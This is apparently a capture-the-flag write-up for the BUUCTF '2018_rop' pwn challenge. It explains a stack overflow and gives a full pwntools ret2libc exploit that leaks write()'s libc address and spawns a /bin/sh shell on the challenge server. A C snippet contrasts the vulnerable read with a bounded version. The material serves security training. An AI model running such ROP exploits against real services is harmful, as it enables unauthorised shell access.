BUUCTF-PWN-铁人三项(第五赛区)_2018_rop
First check the protections -> check the link type -> make the binary executable -> do a test run.
32-bit program, little-endian
Partial RELRO enabled ----- the GOT is writable
No canary ----- a stack overflow goes undetected
NX enabled ----- the stack is not executable
PIE disabled ----- program addresses are fixed (the addresses shown in IDA are the real ones)
Dynamically linked
Look at the decompiled source in IDA.
read() accepts 0x100 bytes, but buf is only 0x88 bytes, so there is a stack overflow.
buf is 0x88 + 0x4 bytes away from the return address (the extra 4 bytes are the saved ebp).
The program has no backdoor function, but it does call write(). write() can be used to leak the runtime address of a libc function; that address identifies the libc version, and because offsets inside libc are fixed, the addresses of system() and the string "/bin/sh" follow from it. A second stack overflow then calls system("/bin/sh") and gives a shell.
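As an added illustration that is not part of the original writeup (the challenge's own source is not on the page): the read/buffer mismatch described above, reconstructed from the stated sizes, next to a bounded version, with a constructed pipe-based check. Function names and the pipe harness are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Reconstructed from the writeup: buf is 0x88 bytes, read() is given 0x100. */
#define BUF_SIZE 0x88

/* Vulnerable pattern (hypothetical name): the read length comes from the
 * caller, not from the buffer, so any length above 0x88 overwrites the saved
 * ebp and the return address. The challenge passes 0x100 here. Shown for
 * comparison only; it is never called in this file. */
ssize_t vulnerable_read(int fd, size_t len) {
    char buf[BUF_SIZE];
    return read(fd, buf, len);   /* bug when len > sizeof(buf) */
}

/* Hardened version (hypothetical name): the length handed to read() is
 * derived from the buffer itself, leaving one byte for a terminator. Extra
 * input simply stays unread; the stack frame cannot be overrun. */
ssize_t hardened_read(int fd) {
    char buf[BUF_SIZE];
    ssize_t n = read(fd, buf, sizeof(buf) - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;                     /* bytes actually accepted, at most 0x87 */
}

/* Constructed check: push 0x100 bytes of 'A' (the oversized input from the
 * writeup) through a pipe standing in for stdin and report how many bytes
 * the hardened reader accepted. */
ssize_t demo_oversized_input(void) {
    int fds[2];
    char input[0x100];
    if (pipe(fds) != 0)
        return -1;
    memset(input, 'A', sizeof(input));
    ssize_t w = write(fds[1], input, sizeof(input));
    close(fds[1]);
    if (w != (ssize_t)sizeof(input)) {
        close(fds[0]);
        return -1;
    }
    ssize_t n = hardened_read(fds[0]);
    close(fds[0]);
    return n;
}
```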
exp
from pwn import *
from LibcSearcher import *

context(os='linux', endian='little', log_level='debug', arch='i386')
sh = remote('node4.buuoj.cn', 28009)
elf = ELF('./2018_rop')

main_addr = elf.symbols['main']
write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']

# Stage 1: fill buf (0x88 bytes) plus the saved ebp (4 bytes), then call
# write(1, write@got, 4) and return to main so the overflow can be used again.
payload = flat([b'a' * (0x88 + 0x4), write_plt_addr, main_addr, 1, write_got_addr, 4])
sh.sendline(payload)
write_addr = u32(sh.recv(4))   # exactly the 4 bytes that write() printed
print(hex(write_addr))

# Stage 2: identify libc from the leaked address; offsets inside libc are fixed.
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 3: overflow again and call system("/bin/sh"); b'bbbb' is a dummy return address.
payload = flat([b'a' * (0x88 + 0x4), system_addr, b'b' * 4, bin_sh_addr])
sh.sendline(payload)
sh.interactive()
Run it and read the flag.